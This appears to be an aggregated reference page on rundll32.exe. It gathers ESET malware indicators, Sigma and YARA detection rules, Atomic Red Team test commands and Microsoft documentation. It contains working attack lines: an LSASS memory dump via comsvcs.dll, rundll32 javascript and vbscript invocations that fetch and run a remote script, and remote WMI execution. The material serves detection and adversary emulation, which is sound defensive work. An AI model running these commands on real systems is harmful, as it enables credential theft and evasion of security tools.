malware-ioc invisimole %WINDIR%\SysWOW64\drivers\Rundll32.exe © ESET 2014-2018
malware-ioc invisimole "FlashConfigEnrollee" = "shell32 ShellExec_RunDLL "C:\Windows\SysWOW64\drivers\Rundll32.exe" "C:\Windows\SysWOW64\drivers\wdigest.dll",SpInitialize %SHELLCODE_BYTES%" © ESET 2014-2018
malware-ioc win_apt_invisimole_sminit_chain.yml - 'rundll32.exe shell32.dll,ShellExec_RundDLL' © ESET 2014-2018
malware-ioc win_apt_invisimole_wdigest_chain.yml CommandLine\|contains: 'rundll32.exe Shell32.dll ShellExec_RunDLL cmd.exe /c mkdir SMRTNTKY\MessageB.txt' © ESET 2014-2018
malware-ioc win_apt_invisimole_wdigest_chain.yml - '\Windows\SysWOW64\drivers\Rundll32.exe' © ESET 2014-2018
malware-ioc win_apt_invisimole_wrapper_dll.yml Image\|endswith: '\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml title: Suspicious Execution of Rundll32.exe © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml description: Detects instances when Rundll32.exe is executed outside of the system folder, or when Rundll32.exe is unsigned. InvisiMole Group uses a Windows XP version of Rundll32.exe to load and exploit a vulnerable Windows XP library. As Rundll32.exe is signed by a catalog file, older versions will not be signed on newer OS versions which can trigger this detection. © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - Rundll32.exe intentionally copied outside of the system folder. © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - Legitimate use of older version of Rundll32.exe on newer OS © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml Image\|endswith: 'rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - '\Windows\SysWOW64\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - '\Windows\system32\rundll32.exe' © ESET 2014-2018
malware-ioc win_suspicious_rundll32.yml - 'rundll32.exe' © ESET 2014-2018
malware-ioc rtm Windows Update = rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host © ESET 2014-2018
malware-ioc rtm rundll32.exe © ESET 2014-2018
atomic-red-team index.md - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - T1218.011 Rundll32 MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Rundll32 execute VBscript command [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Rundll32 advpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: WMI Execute rundll32 [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.011 Rundll32 MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Rundll32 execute VBscript command [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Rundll32 advpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #5: Rundll32 syssetup.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Rundll32 setupapi.dll Execution [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: WMI Execute rundll32 [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | | | Rundll32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | | | Rundll32 | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1003.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full MIT License. © 2018 Red Canary
atomic-red-team T1036.003.md <blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1047.md - Atomic Test #9 - WMI Execute rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1047.md Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION MIT License. © 2018 Red Canary
atomic-red-team T1047.md ## Atomic Test #9 - WMI Execute rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1047.md wmic /node:#{node} process call create “rundll32.exe #{dll_to_execute} #{function_to_execute}” MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | rundll32_file_path | Location of rundll32.exe | Path | $env:windir\system32\rundll32.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md # T1218.011 - Rundll32 MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md <blockquote>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #2 - Rundll32 execute VBscript command MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #3 - Rundll32 advpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #4 - Rundll32 ieadvpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #5 - Rundll32 syssetup.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #6 - Rundll32 setupapi.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md - Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:#{file_url}”).Exec(); MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #2 - Rundll32 execute VBscript command MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md | command_to_execute | Command for rundll32.exe to execute | String | calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32 vbscript:”..\mshtml,RunHTMLApplication “+String(CreateObject(“WScript.Shell”).Run(“#{command_to_execute}”),0) MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #3 - Rundll32 advpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with advpack.dll. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #4 - Rundll32 ieadvpack.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with ieadvpack.dll. MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #5 - Rundll32 syssetup.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying “installation failed” will be opened MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .#{inf_to_execute} MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #6 - Rundll32 setupapi.dll Execution MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying “installation failed” will be opened MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .#{inf_to_execute} MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe URL.dll,FileProtocolHandler C:\..\Detail\akteullen.vbs MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with “rundll32 spawned wscript” MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md ## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll MIT License. © 2018 Red Canary
atomic-red-team T1218.011.md rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) MIT License. © 2018 Red Canary
signature-base apt_apt29_nobelium_may21.yar $a1 = “rundll32.exe” wide CC BY-NC 4.0
signature-base apt_apt29_nobelium_may21.yar $s2 = “rundll32.exe %s %s” ascii fullword CC BY-NC 4.0
signature-base apt_apt29_nobelium_may21.yar $s1 = “rundll32.exe {0} {1}” wide fullword CC BY-NC 4.0
signature-base apt_apt41.yar $s1 = “Rundll32.exe "%s", DisPlay 64” fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $s0 = “rundll32 "%s",%s” fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $s1 = “rundll32.exe "%s", RunMeByDLL32” fullword ascii CC BY-NC 4.0
signature-base apt_codoso.yar $x2 = “rundll32.exe "%s", RunMeByDLL32” fullword ascii CC BY-NC 4.0
signature-base apt_derusbi.yar $x4 = “rundll32.exe "%s", R32 %s” fullword wide CC BY-NC 4.0
signature-base apt_emissary.yar $s3 = “rundll32.exe "%s",Setting” fullword ascii CC BY-NC 4.0
signature-base apt_freemilk.yar $s4 = “outFile=sysDir&"\rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base apt_glassRAT.yar // $bin2 = {34 02} // xor al, 2 —> XOR key for rundll32.exe CC BY-NC 4.0
signature-base apt_glassRAT.yar $s1 = “pwlfnn10,gzg” // rundll32.exe XOR 02 CC BY-NC 4.0
signature-base apt_glassRAT.yar $s6 = “rundll32 "%s",AddNum” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x2 = “rundll32.exe %s RunningRat” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x4 = “rundll32.exe %s ExportFunction” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $x5 = “rundll32.exe "%s" RunningRat” fullword ascii CC BY-NC 4.0
signature-base apt_golddragon.yar $s5 = “rundll32.exe "%s" Run” fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $s4 = “rundll32.exe %s Main” fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $x1 = “rundll32.exe %s SSSS & exit” fullword ascii CC BY-NC 4.0
signature-base apt_keyboys.yar $x1 = “%s\rundll32.exe %s ServiceTake %s %s” fullword ascii CC BY-NC 4.0
signature-base apt_khrat.yar $x2 = “CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication” ascii CC BY-NC 4.0
signature-base apt_korplug_fast.yar $x1 = “%s\rundll32.exe "%s", ShadowPlay” fullword ascii CC BY-NC 4.0
signature-base apt_korplug_fast.yar $s1 = “%s\rundll32.exe "%s",” fullword ascii CC BY-NC 4.0
signature-base apt_op_cloudhopper.yar $s2 = “rundll32.exe "%s", UnInstall /update %s” fullword wide CC BY-NC 4.0
signature-base apt_rokrat.yar $x3 = “outFile=sysDir&"\rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base apt_sakula.yar $str02 = “cmd.exe /c rundll32 "%s" Play "%s"” CC BY-NC 4.0
signature-base apt_sakula.yar $str08 = “cmd.exe /c rundll32 "%s" ActiveQvaw "%s"” CC BY-NC 4.0
signature-base apt_sofacy_oct17_camp.yar $s1 = “start rundll32.exe %path %,#1a” fullword ascii CC BY-NC 4.0
signature-base apt_tidepool.yar $s2 = “C:\Windows\System32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_wildneutron.yar $s0 = “rundll32.exe "%s",#1” fullword wide /* PEStudio Blacklist: strings / / score: ‘33.00’ */ CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s1 = “%s\system32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $r1 = “C:\Windows\syswow64\rundll32.exe</Command>” fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s2 = “%s\system32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $s3 = “%s\SysWOW64\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base apt_winnti.yar $a9 = “\rundll32.exe” wide CC BY-NC 4.0
signature-base apt_winnti_burning_umbrella.yar $s2 = “rundll32.exe %s,Startup” fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_webshells.yar $s3 = “$cmd="cmd /c rundll32.exe $path,install $openPort $activeStr";” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_badrabbit.yar $s9 = “process call create "C:\Windows\System32\rundll32.exe” fullword wide CC BY-NC 4.0
signature-base crime_fireball.yar $s2 = “rundll32.exe "%s",%s” fullword wide CC BY-NC 4.0
signature-base crime_fireball.yar $s2 = “RunDll32.exe "” fullword wide CC BY-NC 4.0
signature-base crime_kriskynote.yar $s1 = “rundll32 %s Check” fullword ascii CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar $x2 = “process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 “ fullword wide CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar $x3 = “-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 “ fullword wide CC BY-NC 4.0
signature-base crime_nopetya_jun17.yar /* ,#1 ….. rundll32.exe */ CC BY-NC 4.0
signature-base generic_anomalies.yar description = “Detects uncommon file size of rundll32.exe” CC BY-NC 4.0
signature-base generic_anomalies.yar and filename == “rundll32.exe” CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $x6 = “Dim binary : binary = "rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $s1 = “binary = "rundll32.exe"” fullword ascii CC BY-NC 4.0
signature-base gen_gen_cactustorch.yar $s4 = “var binary = "rundll32.exe";” fullword ascii CC BY-NC 4.0
signature-base gen_malware_set_qa.yar $s4 = “\sysnative\rundll32.exe” fullword ascii CC BY-NC 4.0
signature-base gen_powershdll.yar $x1 = “rundll32 PowerShdll,main -f " fullword wide CC BY-NC 4.0
signature-base gen_powershdll.yar $x3 = “rundll32 PowerShdll,main CC BY-NC 4.0
signature-base gen_rats_malwareconfig.yar $s7 = “cmd.exe /c rundll32 "%s"” CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar description = “Tool used in Operation Cloud Hopper - pscp.exe cloaked as rundll32.exe” CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar all of them and filename == “rundll32.exe” CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


rundll32

Loads and runs 32-bit dynamic-link libraries (DLLs). There are no configurable settings for Rundll32. Help information is provided for a specific DLL you run with the rundll32 command.

You must run the rundll32 command from an elevated command prompt. To open an elevated command prompt, click Start, right-click Command Prompt, and then click Run as administrator.

Syntax

rundll32 <DLLname>

Parameters

Parameter Description
Rundll32 printui.dll,PrintUIEntry Displays the printer user interface.

Remarks

Rundll32 can only call functions from a DLL explicitly written to be called by Rundll32.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.